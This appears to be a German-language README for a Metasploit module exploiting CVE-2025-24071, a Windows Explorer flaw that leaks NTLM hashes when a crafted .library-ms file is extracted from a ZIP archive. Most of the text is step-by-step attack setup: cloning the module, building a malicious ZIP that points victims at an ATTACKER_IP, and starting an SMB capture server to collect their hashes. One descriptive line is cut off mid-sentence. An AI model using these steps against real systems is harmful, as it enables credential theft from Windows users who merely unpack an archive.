
Metasploit-Modul für CVE-2025-24071 - Windows-NTLM-Hash-Leak via .library-ms
Dieses Repository enthält ein Metasploit-Modul zur Ausnutzung von CVE-2025-24071, einer Schwachstelle in Windows Explorer, die NTLM-Hashes preisgibt, wenn eine bösartige .library-ms-Datei aus einem ZIP-Archiv extrahiert wird.
Entwickelt von: FOLKS-IWD
Die Schwachstelle tritt auf, wenn ein Benutzer ein ZIP-Archiv extrahiert, das eine speziell präparierte .library-ms-Datei enthält. Windows Explorer initiiert automatisch eine SMB-Authentifizierungsanfrage an einen in der Datei angegebenen Remoteserver, wodurch der NTLM-Hash des Benutzers ohne jegliche Benutzerinteraktion preisgegeben wird.
Dieses Metasploit-Modul:
.library-ms-Datei.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run